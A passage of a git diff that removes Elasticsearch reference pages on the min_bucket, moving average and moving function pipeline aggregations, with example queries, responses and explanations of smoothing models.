TESTRESPONSE[s/"took": 11/"took": $body.took/] -// TESTRESPONSE[s/"_shards": \.\.\./"_shards": $body._shards/] -// TESTRESPONSE[s/"hits": \.\.\./"hits": $body.hits/] - -<1> `keys` is an array of strings since the maximum value may be present in multiple buckets diff --git a/docs/reference/aggregations/pipeline/min-bucket-aggregation.asciidoc b/docs/reference/aggregations/pipeline/min-bucket-aggregation.asciidoc deleted file mode 100644 index c2185303ab7..00000000000 --- a/docs/reference/aggregations/pipeline/min-bucket-aggregation.asciidoc +++ /dev/null @@ -1,120 +0,0 @@ -[[search-aggregations-pipeline-min-bucket-aggregation]] -=== Min bucket aggregation -++++ -Min bucket -++++ - -A sibling pipeline aggregation which identifies the bucket(s) with the minimum value of a specified metric in a sibling aggregation -and outputs both the value and the key(s) of the bucket(s). The specified metric must be numeric and the sibling aggregation must -be a multi-bucket aggregation. - -==== Syntax - -A `min_bucket` aggregation looks like this in isolation: - -[source,js] --------------------------------------------------- -{ - "min_bucket": { - "buckets_path": "the_sum" - } -} --------------------------------------------------- -// NOTCONSOLE - -[[min-bucket-params]] -.`min_bucket` Parameters -[options="header"] -|=== -|Parameter Name |Description |Required |Default Value -|`buckets_path` |The path to the buckets we wish to find the minimum for (see <> for more - details) |Required | - |`gap_policy` |The policy to apply when gaps are found in the data (see <> for more - details)|Optional | `skip` - |`format` |format to apply to the output value of this aggregation |Optional |`null` -|=== - -The following snippet calculates the minimum of the total monthly `sales`: - -[source,console] --------------------------------------------------- -POST /sales/_search -{ - "size": 0, - "aggs": { - "sales_per_month": { - "date_histogram": { - "field": "date", - "calendar_interval": "month" - }, - "aggs": { - "sales": { - "sum": { - "field": "price" - } - } - } - }, - "min_monthly_sales": { - "min_bucket": { - "buckets_path": "sales_per_month>sales" <1> - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -<1> `buckets_path` instructs this min_bucket aggregation that we want the minimum value of the `sales` aggregation in the -`sales_per_month` date histogram. - -And the following may be the response: - -[source,console-result] --------------------------------------------------- -{ - "took": 11, - "timed_out": false, - "_shards": ..., - "hits": ..., - "aggregations": { - "sales_per_month": { - "buckets": [ - { - "key_as_string": "2015/01/01 00:00:00", - "key": 1420070400000, - "doc_count": 3, - "sales": { - "value": 550.0 - } - }, - { - "key_as_string": "2015/02/01 00:00:00", - "key": 1422748800000, - "doc_count": 2, - "sales": { - "value": 60.0 - } - }, - { - "key_as_string": "2015/03/01 00:00:00", - "key": 1425168000000, - "doc_count": 2, - "sales": { - "value": 375.0 - } - } - ] - }, - "min_monthly_sales": { - "keys": ["2015/02/01 00:00:00"], <1> - "value": 60.0 - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 11/"took": $body.took/] -// TESTRESPONSE[s/"_shards": \.\.\./"_shards": $body._shards/] -// TESTRESPONSE[s/"hits": \.\.\./"hits": $body.hits/] - -<1> `keys` is an array of strings since the minimum value may be present in multiple buckets diff --git a/docs/reference/aggregations/pipeline/movavg-aggregation.asciidoc b/docs/reference/aggregations/pipeline/movavg-aggregation.asciidoc deleted file mode 100644 index 60a5d301fb1..00000000000 --- a/docs/reference/aggregations/pipeline/movavg-aggregation.asciidoc +++ /dev/null @@ -1,653 +0,0 @@ -[[search-aggregations-pipeline-movavg-aggregation]] -=== Moving average aggregation -++++ -Moving average -++++ - -deprecated:[6.4.0, "The Moving Average aggregation has been deprecated in favor of the more general <>. The new Moving Function aggregation provides all the same functionality as the Moving Average aggregation, but also provides more flexibility."] - -Given an ordered series of data, the Moving Average aggregation will slide a window across the data and emit the average -value of that window. For example, given the data `[1, 2, 3, 4, 5, 6, 7, 8, 9, 10]`, we can calculate a simple moving -average with windows size of `5` as follows: - -- (1 + 2 + 3 + 4 + 5) / 5 = 3 -- (2 + 3 + 4 + 5 + 6) / 5 = 4 -- (3 + 4 + 5 + 6 + 7) / 5 = 5 -- etc - -Moving averages are a simple method to smooth sequential data. Moving averages are typically applied to time-based data, -such as stock prices or server metrics. The smoothing can be used to eliminate high frequency fluctuations or random noise, -which allows the lower frequency trends to be more easily visualized, such as seasonality. - -==== Syntax - -A `moving_avg` aggregation looks like this in isolation: - -[source,js] --------------------------------------------------- -{ - "moving_avg": { - "buckets_path": "the_sum", - "model": "holt", - "window": 5, - "gap_policy": "insert_zeros", - "settings": { - "alpha": 0.8 - } - } -} --------------------------------------------------- -// NOTCONSOLE - -.`moving_avg` Parameters -|=== -|Parameter Name |Description |Required |Default Value -|`buckets_path` |Path to the metric of interest (see <> for more details |Required | -|`model` |The moving average weighting model that we wish to use |Optional |`simple` -|`gap_policy` |The policy to apply when gaps are found in the data. See <>. |Optional |`skip` -|`window` |The size of window to "slide" across the histogram. |Optional |`5` -|`minimize` |If the model should be algorithmically minimized. See <> for more - details |Optional |`false` for most models -|`settings` |Model-specific settings, contents which differ depending on the model specified. |Optional | -|=== - -`moving_avg` aggregations must be embedded inside of a `histogram` or `date_histogram` aggregation. They can be -embedded like any other metric aggregation: - -[source,console] --------------------------------------------------- -POST /_search -{ - "size": 0, - "aggs": { - "my_date_histo": { <1> - "date_histogram": { - "field": "date", - "calendar_interval": "1M" - }, - "aggs": { - "the_sum": { - "sum": { "field": "price" } <2> - }, - "the_movavg": { - "moving_avg": { "buckets_path": "the_sum" } <3> - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] -// TEST[warning:The moving_avg aggregation has been deprecated in favor of the moving_fn aggregation.] - -<1> A `date_histogram` named "my_date_histo" is constructed on the "timestamp" field, with one-day intervals -<2> A `sum` metric is used to calculate the sum of a field. This could be any metric (sum, min, max, etc) -<3> Finally, we specify a `moving_avg` aggregation which uses "the_sum" metric as its input. - -Moving averages are built by first specifying a `histogram` or `date_histogram` over a field. You can then optionally -add normal metrics, such as a `sum`, inside of that histogram. Finally, the `moving_avg` is embedded inside the histogram. -The `buckets_path` parameter is then used to "point" at one of the sibling metrics inside of the histogram (see -<> for a description of the syntax for `buckets_path`. - -An example response from the above aggregation may look like: - -[source,js] --------------------------------------------------- -{ - "took": 11, - "timed_out": false, - "_shards": ..., - "hits": ..., - "aggregations": { - "my_date_histo": { - "buckets": [ - { - "key_as_string": "2015/01/01 00:00:00", - "key": 1420070400000, - "doc_count": 3, - "the_sum": { - "value": 550.0 - } - }, - { - "key_as_string": "2015/02/01 00:00:00", - "key": 1422748800000, - "doc_count": 2, - "the_sum": { - "value": 60.0 - }, - "the_movavg": { - "value": 550.0 - } - }, - { - "key_as_string": "2015/03/01 00:00:00", - "key": 1425168000000, - "doc_count": 2, - "the_sum": { - "value": 375.0 - }, - "the_movavg": { - "value": 305.0 - } - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 11/"took": $body.took/] -// TESTRESPONSE[s/"_shards": \.\.\./"_shards": $body._shards/] -// TESTRESPONSE[s/"hits": \.\.\./"hits": $body.hits/] - - -==== Models - -The `moving_avg` aggregation includes four different moving average "models". The main difference is how the values in the -window are weighted. As data-points become "older" in the window, they may be weighted differently. This will -affect the final average for that window. - -Models are specified using the `model` parameter. Some models may have optional configurations which are specified inside -the `settings` parameter. - -===== Simple - -The `simple` model calculates the sum of all values in the window, then divides by the size of the window. It is effectively -a simple arithmetic mean of the window. The simple model does not perform any time-dependent weighting, which means -the values from a `simple` moving average tend to "lag" behind the real data. - -[source,console] --------------------------------------------------- -POST /_search -{ - "size": 0, - "aggs": { - "my_date_histo": { - "date_histogram": { - "field": "date", - "calendar_interval": "1M" - }, - "aggs": { - "the_sum": { - "sum": { "field": "price" } - }, - "the_movavg": { - "moving_avg": { - "buckets_path": "the_sum", - "window": 30, - "model": "simple" - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] -// TEST[warning:The moving_avg aggregation has been deprecated in favor of the moving_fn aggregation.] - -A `simple` model has no special settings to configure - -The window size can change the behavior of the moving average. For example, a small window (`"window": 10`) will closely -track the data and only smooth out small scale fluctuations: - -[[movavg_10window]] -.Moving average with window of size 10 -image::images/pipeline_movavg/movavg_10window.png[] - -In contrast, a `simple` moving average with larger window (`"window": 100`) will smooth out all higher-frequency fluctuations, -leaving only low-frequency, long term trends. It also tends to "lag" behind the actual data by a substantial amount: - -[[movavg_100window]] -.Moving average with window of size 100 -image::images/pipeline_movavg/movavg_100window.png[] - - -==== Linear - -The `linear` model assigns a linear weighting to points in the series, such that "older" datapoints (e.g. those at -the beginning of the window) contribute a linearly less amount to the total average. The linear weighting helps reduce -the "lag" behind the data's mean, since older points have less influence. - -[source,console] --------------------------------------------------- -POST /_search -{ - "size": 0, - "aggs": { - "my_date_histo": { - "date_histogram": { - "field": "date", - "calendar_interval": "1M" - }, - "aggs": { - "the_sum": { - "sum": { "field": "price" } - }, - "the_movavg": { - "moving_avg": { - "buckets_path": "the_sum", - "window": 30, - "model": "linear" - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] -// TEST[warning:The moving_avg aggregation has been deprecated in favor of the moving_fn aggregation.] - -A `linear` model has no special settings to configure - -Like the `simple` model, window size can change the behavior of the moving average. For example, a small window (`"window": 10`) -will closely track the data and only smooth out small scale fluctuations: - -[[linear_10window]] -.Linear moving average with window of size 10 -image::images/pipeline_movavg/linear_10window.png[] - -In contrast, a `linear` moving average with larger window (`"window": 100`) will smooth out all higher-frequency fluctuations, -leaving only low-frequency, long term trends. It also tends to "lag" behind the actual data by a substantial amount, -although typically less than the `simple` model: - -[[linear_100window]] -.Linear moving average with window of size 100 -image::images/pipeline_movavg/linear_100window.png[] - -==== EWMA (Exponentially Weighted) - -The `ewma` model (aka "single-exponential") is similar to the `linear` model, except older data-points become exponentially less important, -rather than linearly less important. The speed at which the importance decays can be controlled with an `alpha` -setting. Small values make the weight decay slowly, which provides greater smoothing and takes into account a larger -portion of the window. Larger values make the weight decay quickly, which reduces the impact of older values on the -moving average. This tends to make the moving average track the data more closely but with less smoothing. - -The default value of `alpha` is `0.3`, and the setting accepts any float from 0-1 inclusive. - -The EWMA model can be <> - -[source,console] --------------------------------------------------- -POST /_search -{ - "size": 0, - "aggs": { - "my_date_histo": { - "date_histogram": { - "field": "date", - "calendar_interval": "1M" - }, - "aggs": { - "the_sum": { - "sum": { "field": "price" } - }, - "the_movavg": { - "moving_avg": { - "buckets_path": "the_sum", - "window": 30, - "model": "ewma", - "settings": { - "alpha": 0.5 - } - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] -// TEST[warning:The moving_avg aggregation has been deprecated in favor of the moving_fn aggregation.] - -[[single_0.2alpha]] -.EWMA with window of size 10, alpha = 0.2 -image::images/pipeline_movavg/single_0.2alpha.png[] - -[[single_0.7alpha]] -.EWMA with window of size 10, alpha = 0.7 -image::images/pipeline_movavg/single_0.7alpha.png[] - -==== Holt-Linear - -The `holt` model (aka "double exponential") incorporates a second exponential term which -tracks the data's trend. Single exponential does not perform well when the data has an underlying linear trend. The -double exponential model calculates two values internally: a "level" and a "trend". - -The level calculation is similar to `ewma`, and is an exponentially weighted view of the data. The difference is -that the previously smoothed value is used instead of the raw value, which allows it to stay close to the original series. -The trend calculation looks at the difference between the current and last value (e.g. the slope, or trend, of the -smoothed data). The trend value is also exponentially weighted. - -Values are produced by multiplying the level and trend components. - -The default value of `alpha` is `0.3` and `beta` is `0.1`. The settings accept any float from 0-1 inclusive. - -The Holt-Linear model can be <> - -[source,console] --------------------------------------------------- -POST /_search -{ - "size": 0, - "aggs": { - "my_date_histo": { - "date_histogram": { - "field": "date", - "calendar_interval": "1M" - }, - "aggs": { - "the_sum": { - "sum": { "field": "price" } - }, - "the_movavg": { - "moving_avg": { - "buckets_path": "the_sum", - "window": 30, - "model": "holt", - "settings": { - "alpha": 0.5, - "beta": 0.5 - } - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] -// TEST[warning:The moving_avg aggregation has been deprecated in favor of the moving_fn aggregation.] - -In practice, the `alpha` value behaves very similarly in `holt` as `ewma`: small values produce more smoothing -and more lag, while larger values produce closer tracking and less lag. The value of `beta` is often difficult -to see. Small values emphasize long-term trends (such as a constant linear trend in the whole series), while larger -values emphasize short-term trends. This will become more apparently when you are predicting values. - -[[double_0.2beta]] -.Holt-Linear moving average with window of size 100, alpha = 0.5, beta = 0.2 -image::images/pipeline_movavg/double_0.2beta.png[] - -[[double_0.7beta]] -.Holt-Linear moving average with window of size 100, alpha = 0.5, beta = 0.7 -image::images/pipeline_movavg/double_0.7beta.png[] - -==== Holt-Winters - -The `holt_winters` model (aka "triple exponential") incorporates a third exponential term which -tracks the seasonal aspect of your data. This aggregation therefore smooths based on three components: "level", "trend" -and "seasonality". - -The level and trend calculation is identical to `holt` The seasonal calculation looks at the difference between -the current point, and the point one period earlier. - -Holt-Winters requires a little more handholding than the other moving averages. You need to specify the "periodicity" -of your data: e.g. if your data has cyclic trends every 7 days, you would set `period: 7`. Similarly if there was -a monthly trend, you would set it to `30`. There is currently no periodicity detection, although that is planned -for future enhancements. - -There are two varieties of Holt-Winters: additive and multiplicative. - -===== "Cold Start" - -Unfortunately, due to the nature of Holt-Winters, it requires two periods of data to "bootstrap" the algorithm. This -means that your `window` must always be *at least* twice the size of your period. An exception will be thrown if it -isn't. It also means that Holt-Winters will not emit a value for the first `2 * period` buckets; the current algorithm -does not backcast. - -[[holt_winters_cold_start]] -.Holt-Winters showing a "cold" start where no values are emitted -image::images/pipeline_movavg/triple_untruncated.png[] - -Because the "cold start" obscures what the moving average looks like, the rest of the Holt-Winters images are truncated -to not show the "cold start". Just be aware this will always be present at the beginning of your moving averages! - -===== Additive Holt-Winters - -Additive seasonality is the default; it can also be specified by setting `"type": "add"`. This variety is preferred -when the seasonal affect is additive to your data. E.g. you could simply subtract the seasonal effect to "de-seasonalize" -your data into a flat trend. - -The default values of `alpha` and `gamma` are `0.3` while `beta` is `0.1`. The settings accept any float from 0-1 inclusive. -The default value of `period` is `1`. - -The additive Holt-Winters model can be <> - -[source,console] --------------------------------------------------- -POST /_search -{ - "size": 0, - "aggs": { - "my_date_histo": { - "date_histogram": { - "field": "date", - "calendar_interval": "1M" - }, - "aggs": { - "the_sum": { - "sum": { "field": "price" } - }, - "the_movavg": { - "moving_avg": { - "buckets_path": "the_sum", - "window": 30, - "model": "holt_winters", - "settings": { - "type": "add", - "alpha": 0.5, - "beta": 0.5, - "gamma": 0.5, - "period": 7 - } - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] -// TEST[warning:The moving_avg aggregation has been deprecated in favor of the moving_fn aggregation.] - -[[holt_winters_add]] -.Holt-Winters moving average with window of size 120, alpha = 0.5, beta = 0.7, gamma = 0.3, period = 30 -image::images/pipeline_movavg/triple.png[] - -===== Multiplicative Holt-Winters - -Multiplicative is specified by setting `"type": "mult"`. This variety is preferred when the seasonal affect is -multiplied against your data. E.g. if the seasonal affect is x5 the data, rather than simply adding to it. - -The default values of `alpha` and `gamma` are `0.3` while `beta` is `0.1`. The settings accept any float from 0-1 inclusive. -The default value of `period` is `1`. - -The multiplicative Holt-Winters model can be <> - -[WARNING] -====== -Multiplicative Holt-Winters works by dividing each data point by the seasonal value. This is problematic if any of -your data is zero, or if there are gaps in the data (since this results in a divid-by-zero). To combat this, the -`mult` Holt-Winters pads all values by a very small amount (1*10^-10^) so that all values are non-zero. This affects -the result, but only minimally. If your data is non-zero, or you prefer to see `NaN` when zero's are encountered, -you can disable this behavior with `pad: false` -====== - -[source,console] --------------------------------------------------- -POST /_search -{ - "size": 0, - "aggs": { - "my_date_histo": { - "date_histogram": { - "field": "date", - "calendar_interval": "1M" - }, - "aggs": { - "the_sum": { - "sum": { "field": "price" } - }, - "the_movavg": { - "moving_avg": { - "buckets_path": "the_sum", - "window": 30, - "model": "holt_winters", - "settings": { - "type": "mult", - "alpha": 0.5, - "beta": 0.5, - "gamma": 0.5, - "period": 7, - "pad": true - } - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] -// TEST[warning:The moving_avg aggregation has been deprecated in favor of the moving_fn aggregation.] - -==== Prediction - -experimental[] - -All the moving average model support a "prediction" mode, which will attempt to extrapolate into the future given the -current smoothed, moving average. Depending on the model and parameter, these predictions may or may not be accurate. - -Predictions are enabled by adding a `predict` parameter to any moving average aggregation, specifying the number of -predictions you would like appended to the end of the series. These predictions will be spaced out at the same interval -as your buckets: - -[source,console] --------------------------------------------------- -POST /_search -{ - "size": 0, - "aggs": { - "my_date_histo": { - "date_histogram": { - "field": "date", - "calendar_interval": "1M" - }, - "aggs": { - "the_sum": { - "sum": { "field": "price" } - }, - "the_movavg": { - "moving_avg": { - "buckets_path": "the_sum", - "window": 30, - "model": "simple", - "predict": 10 - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] -// TEST[warning:The moving_avg aggregation has been deprecated in favor of the moving_fn aggregation.] - -The `simple`, `linear` and `ewma` models all produce "flat" predictions: they essentially converge on the mean -of the last value in the series, producing a flat: - -[[simple_prediction]] -.Simple moving average with window of size 10, predict = 50 -image::images/pipeline_movavg/simple_prediction.png[] - -In contrast, the `holt` model can extrapolate based on local or global constant trends. If we set a high `beta` -value, we can extrapolate based on local constant trends (in this case the predictions head down, because the data at the end -of the series was heading in a downward direction): - -[[double_prediction_local]] -.Holt-Linear moving average with window of size 100, predict = 20, alpha = 0.5, beta = 0.8 -image::images/pipeline_movavg/double_prediction_local.png[] - -In contrast, if we choose a small `beta`, the predictions are based on the global constant trend. In this series, the -global trend is slightly positive, so the prediction makes a sharp u-turn and begins a positive slope: - -[[double_prediction_global]] -.Double Exponential moving average with window of size 100, predict = 20, alpha = 0.5, beta = 0.1 -image::images/pipeline_movavg/double_prediction_global.png[] - -The `holt_winters` model has the potential to deliver the best predictions, since it also incorporates seasonal -fluctuations into the model: - -[[holt_winters_prediction_global]] -.Holt-Winters moving average with window of size 120, predict = 25, alpha = 0.8, beta = 0.2, gamma = 0.7, period = 30 -image::images/pipeline_movavg/triple_prediction.png[] - -[[movavg-minimizer]] -==== Minimization - -Some of the models (EWMA, Holt-Linear, Holt-Winters) require one or more parameters to be configured. Parameter choice -can be tricky and sometimes non-intuitive. Furthermore, small deviations in these parameters can sometimes have a drastic -effect on the output moving average. - -For that reason, the three "tunable" models can be algorithmically *minimized*. Minimization is a process where parameters -are tweaked until the predictions generated by the model closely match the output data. Minimization is not fullproof -and can be susceptible to overfitting, but it often gives better results than hand-tuning. - -Minimization is disabled by default for `ewma` and `holt_linear`, while it is enabled by default for `holt_winters`. -Minimization is most useful with Holt-Winters, since it helps improve the accuracy of the predictions. EWMA and -Holt-Linear are not great predictors, and mostly used for smoothing data, so minimization is less useful on those -models. - -Minimization is enabled/disabled via the `minimize` parameter: - -[source,console] --------------------------------------------------- -POST /_search -{ - "size": 0, - "aggs": { - "my_date_histo": { - "date_histogram": { - "field": "date", - "calendar_interval": "1M" - }, - "aggs": { - "the_sum": { - "sum": { "field": "price" } - }, - "the_movavg": { - "moving_avg": { - "buckets_path": "the_sum", - "model": "holt_winters", - "window": 30, - "minimize": true, <1> - "settings": { - "period": 7 - } - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] -// TEST[warning:The moving_avg aggregation has been deprecated in favor of the moving_fn aggregation.] - -<1> Minimization is enabled with the `minimize` parameter - -When enabled, minimization will find the optimal values for `alpha`, `beta` and `gamma`. The user should still provide -appropriate values for `window`, `period` and `type`. - -[WARNING] -====== -Minimization works by running a stochastic process called *simulated annealing*. This process will usually generate -a good solution, but is not guaranteed to find the global optimum. It also requires some amount of additional -computational power, since the model needs to be re-run multiple times as the values are tweaked. The run-time of -minimization is linear to the size of the window being processed: excessively large windows may cause latency. - -Finally, minimization fits the model to the last `n` values, where `n = window`. This generally produces -better forecasts into the future, since the parameters are tuned around the end of the series. It can, however, generate -poorer fitting moving averages at the beginning of the series. -====== diff --git a/docs/reference/aggregations/pipeline/movfn-aggregation.asciidoc b/docs/reference/aggregations/pipeline/movfn-aggregation.asciidoc deleted file mode 100644 index 43829005330..00000000000 --- a/docs/reference/aggregations/pipeline/movfn-aggregation.asciidoc +++ /dev/null @@ -1,660 +0,0 @@ -[[search-aggregations-pipeline-movfn-aggregation]] -=== Moving function aggregation -++++ -Moving function -++++ - -Given an ordered series of data, the Moving Function aggregation will slide a window across the data and allow the user to specify a custom -script that is executed on each window of data. For convenience, a number of common functions are predefined such as min/max, moving averages, -etc. - -This is conceptually very similar to the <> pipeline aggregation, except -it provides more functionality. - -==== Syntax - -A `moving_fn` aggregation looks like this in isolation: - -[source,js] --------------------------------------------------- -{ - "moving_fn": { - "buckets_path": "the_sum", - "window": 10, - "script": "MovingFunctions.min(values)" - } -} --------------------------------------------------- -// NOTCONSOLE - -[[moving-fn-params]] -.`moving_fn` Parameters -[options="header"] -|=== -|Parameter Name |Description |Required |Default Value -|`buckets_path` |Path to the metric of interest (see <> for more details |Required | -|`window` |The size of window to "slide" across the histogram. |Required | -|`script` |The script that should be executed on each window of data |Required | -|`gap_policy` |The policy to apply when gaps are found in the data. See <>. |Optional |`skip` -|`shift` |<> of window position. |Optional | 0 -|=== - -`moving_fn` aggregations must be embedded inside of a `histogram` or `date_histogram` aggregation. They can be -embedded like any other metric aggregation: - -[source,console] --------------------------------------------------- -POST /_search -{ - "size": 0, - "aggs": { - "my_date_histo": { <1> - "date_histogram": { - "field": "date", - "calendar_interval": "1M" - }, - "aggs": { - "the_sum": { - "sum": { "field": "price" } <2> - }, - "the_movfn": { - "moving_fn": { - "buckets_path": "the_sum", <3> - "window": 10, - "script": "MovingFunctions.unweightedAvg(values)" - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -<1> A `date_histogram` named "my_date_histo" is constructed on the "timestamp" field, with one-day intervals -<2> A `sum` metric is used to calculate the sum of a field. This could be any numeric metric (sum, min, max, etc) -<3> Finally, we specify a `moving_fn` aggregation which uses "the_sum" metric as its input. - -Moving averages are built by first specifying a `histogram` or `date_histogram` over a field. You can then optionally -add numeric metrics, such as a `sum`, inside of that histogram. Finally, the `moving_fn` is embedded inside the histogram. -The `buckets_path` parameter is then used to "point" at one of the sibling metrics inside of the histogram (see -<> for a description of the syntax for `buckets_path`. - -An example response from the above aggregation may look like: - -[source,console-result] --------------------------------------------------- -{ - "took": 11, - "timed_out": false, - "_shards": ..., - "hits": ..., - "aggregations": { - "my_date_histo": { - "buckets": [ - { - "key_as_string": "2015/01/01 00:00:00", - "key": 1420070400000, - "doc_count": 3, - "the_sum": { - "value": 550.0 - }, - "the_movfn": { - "value": null - } - }, - { - "key_as_string": "2015/02/01 00:00:00", - "key": 1422748800000, - "doc_count": 2, - "the_sum": { - "value": 60.0 - }, - "the_movfn": { - "value": 550.0 - } - }, - { - "key_as_string": "2015/03/01 00:00:00", - "key": 1425168000000, - "doc_count": 2, - "the_sum": { - "value": 375.0 - }, - "the_movfn": { - "value": 305.0 - } - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 11/"took": $body.took/] -// TESTRESPONSE[s/"_shards": \.\.\./"_shards": $body._shards/] -// TESTRESPONSE[s/"hits": \.\.\./"hits": $body.hits/] - - -==== Custom user scripting - -The Moving Function aggregation allows the user to specify any arbitrary script to define custom logic. The script is invoked each time a -new window of data is collected. These values are provided to the script in the `values` variable. The script should then perform some -kind of calculation and emit a single `double` as the result. Emitting `null` is not permitted, although `NaN` and +/- `Inf` are allowed. - -For example, this script will simply return the first value from the window, or `NaN` if no values are available: - -[source,console] --------------------------------------------------- -POST /_search -{ - "size": 0, - "aggs": { - "my_date_histo": { - "date_histogram": { - "field": "date", - "calendar_interval": "1M" - }, - "aggs": { - "the_sum": { - "sum": { "field": "price" } - }, - "the_movavg": { - "moving_fn": { - "buckets_path": "the_sum", - "window": 10, - "script": "return values.length > 0 ? values[0] : Double.NaN" - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -[[shift-parameter]] -==== shift parameter - -By default (with `shift = 0`), the window that is offered for calculation is the last `n` values excluding the current bucket. -Increasing `shift` by 1 moves starting window position by `1` to the right. - -- To include current bucket to the window, use `shift = 1`. -- For center alignment (`n / 2` values before and after the current bucket), use `shift = window / 2`. -- For right alignment (`n` values after the current bucket), use `shift = window`. - -If either of window edges moves outside the borders of data series, the window shrinks to include available values only. - -==== Pre-built Functions - -For convenience, a number of functions have been prebuilt and are available inside the `moving_fn` script context: - -- `max()` -- `min()` -- `sum()` -- `stdDev()` -- `unweightedAvg()` -- `linearWeightedAvg()` -- `ewma()` -- `holt()` -- `holtWinters()` - -The functions are available from the `MovingFunctions` namespace. E.g. `MovingFunctions.max()` - -===== max Function - -This function accepts a collection of doubles and returns the maximum value in that window. `null` and `NaN` values are ignored; the maximum -is only calculated over the real values. If the window is empty, or all values are `null`/`NaN`, `NaN` is returned as the result. - -[[max-params]] -.`max(double[] values)` Parameters -[options="header"] -|=== -|Parameter Name |Description -|`values` |The window of values to find the maximum -|=== - -[source,console] --------------------------------------------------- -POST /_search -{ - "size": 0, - "aggs": { - "my_date_histo": { - "date_histogram": { - "field": "date", - "calendar_interval": "1M" - }, - "aggs": { - "the_sum": { - "sum": { "field": "price" } - }, - "the_moving_max": { - "moving_fn": { - "buckets_path": "the_sum", - "window": 10, - "script": "MovingFunctions.max(values)" - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -===== min Function - -This function accepts a collection of doubles and returns the minimum value in that window. `null` and `NaN` values are ignored; the minimum -is only calculated over the real values. If the window is empty, or all values are `null`/`NaN`, `NaN` is returned as the result. - -[[min-params]] -.`min(double[] values)` Parameters -[options="header"] -|=== -|Parameter Name |Description -|`values` |The window of values to find the minimum -|=== - -[source,console] --------------------------------------------------- -POST /_search -{ - "size": 0, - "aggs": { - "my_date_histo": { - "date_histogram": { - "field": "date", - "calendar_interval": "1M" - }, - "aggs": { - "the_sum": { - "sum": { "field": "price" } - }, - "the_moving_min": { - "moving_fn": { - "buckets_path": "the_sum", - "window": 10, - "script": "MovingFunctions.min(values)" - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -===== sum Function - -This function accepts a collection of doubles and returns the sum of the values in that window. `null` and `NaN` values are ignored; -the sum is only calculated over the real values. If the window is empty, or all values are `null`/`NaN`, `0.0` is returned as the result. - -[[sum-params]] -.`sum(double[] values)` Parameters -[options="header"] -|=== -|Parameter Name |Description -|`values` |The window of values to find the sum of -|=== - -[source,console] --------------------------------------------------- -POST /_search -{ - "size": 0, - "aggs": { - "my_date_histo": { - "date_histogram": { - "field": "date", - "calendar_interval": "1M" - }, - "aggs": { - "the_sum": { - "sum": { "field": "price" } - }, - "the_moving_sum": { - "moving_fn": { - "buckets_path": "the_sum", - "window": 10, - "script": "MovingFunctions.sum(values)" - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -===== stdDev Function - -This function accepts a collection of doubles and average, then returns the standard deviation of the values in that window. -`null` and `NaN` values are ignored; the sum is only calculated over the real values. If the window is empty, or all values are -`null`/`NaN`, `0.0` is returned as the result. - -[[stddev-params]] -.`stdDev(double[] values)` Parameters -[options="header"] -|=== -|Parameter Name |Description -|`values` |The window of values to find the standard deviation of -|`avg` |The average of the window -|=== - -[source,console] --------------------------------------------------- -POST /_search -{ - "size": 0, - "aggs": { - "my_date_histo": { - "date_histogram": { - "field": "date", - "calendar_interval": "1M" - }, - "aggs": { - "the_sum": { - "sum": { "field": "price" } - }, - "the_moving_sum": { - "moving_fn": { - "buckets_path": "the_sum", - "window": 10, - "script": "MovingFunctions.stdDev(values, MovingFunctions.unweightedAvg(values))" - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -The `avg` parameter must be provided to the standard deviation function because different styles of averages can be computed on the window -(simple, linearly weighted, etc). The various moving averages that are detailed below can be used to calculate the average for the -standard deviation function. - -===== unweightedAvg Function - -The `unweightedAvg` function calculates the sum of all values in the window, then divides by the size of the window. It is effectively -a simple arithmetic mean of the window. The simple moving average does not perform any time-dependent weighting, which means -the values from a `simple` moving average tend to "lag" behind the real data. - -`null` and `NaN` values are ignored; the average is only calculated over the real values. If the window is empty, or all values are -`null`/`NaN`, `NaN` is returned as the result. This means that the count used in the average calculation is count of non-`null`,non-`NaN` -values. - -[[unweightedavg-params]] -.`unweightedAvg(double[] values)` Parameters -[options="header"] -|=== -|Parameter Name |Description -|`values` |The window of values to find the sum of -|=== - -[source,console] --------------------------------------------------- -POST /_search -{ - "size": 0, - "aggs": { - "my_date_histo": { - "date_histogram": { - "field": "date", - "calendar_interval": "1M" - }, - "aggs": { - "the_sum": { - "sum": { "field": "price" } - }, - "the_movavg": { - "moving_fn": { - "buckets_path": "the_sum", - "window": 10, - "script": "MovingFunctions.unweightedAvg(values)" - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -==== linearWeightedAvg Function - -The `linearWeightedAvg` function assigns a linear weighting to points in the series, such that "older" datapoints (e.g. those at -the beginning of the window) contribute a linearly less amount to the total average. The linear weighting helps reduce -the "lag" behind the data's mean, since older points have less influence. - -If the window is empty, or all values are `null`/`NaN`, `NaN` is returned as the result. - -[[linearweightedavg-params]] -.`linearWeightedAvg(double[] values)` Parameters -[options="header"] -|=== -|Parameter Name |Description -|`values` |The window of values to find the sum of -|=== - -[source,console] --------------------------------------------------- -POST /_search -{ - "size": 0, - "aggs": { - "my_date_histo": { - "date_histogram": { - "field": "date", - "calendar_interval": "1M" - }, - "aggs": { - "the_sum": { - "sum": { "field": "price" } - }, - "the_movavg": { - "moving_fn": { - "buckets_path": "the_sum", - "window": 10, - "script": "MovingFunctions.linearWeightedAvg(values)" - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -==== ewma Function - -The `ewma` function (aka "single-exponential") is similar to the `linearMovAvg` function, -except older data-points become exponentially less important, -rather than linearly less important. The speed at which the importance decays can be controlled with an `alpha` 